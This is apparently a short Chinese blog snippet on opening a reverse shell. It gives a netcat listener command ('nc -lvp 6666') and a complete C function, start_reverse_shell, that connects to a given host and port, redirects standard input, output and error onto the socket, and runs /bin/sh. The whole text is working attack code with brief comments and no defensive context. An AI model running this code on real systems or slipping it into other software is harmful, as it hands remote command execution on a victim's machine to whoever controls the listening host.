文章链接:https://codemouse.online/archives/2020-04-02182636
服务器开启监听
nc -lvp 6666
连接服务器,并给服务端一个shell
void start_reverse_shell(char *bd_ip, unsigned short int bd_port)
{
int sd;
struct sockaddr_in serv_addr;
struct hostent *server;
sd = socket(AF_INET, SOCK_STREAM, 0);
if (sd < 0)
return;
server = gethostbyname(bd_ip);
if (server == NULL)
return;
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
serv_addr.sin_port = htons(bd_port);
if (connect(sd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0)
return;
// sdout,stdin and stderr 重定向到服务端的fd中
dup2(sd, 0);
dup2(sd, 1);
dup2(sd, 2);
// 运行shell
execl("/bin/sh", NULL, NULL);
close(sd);
}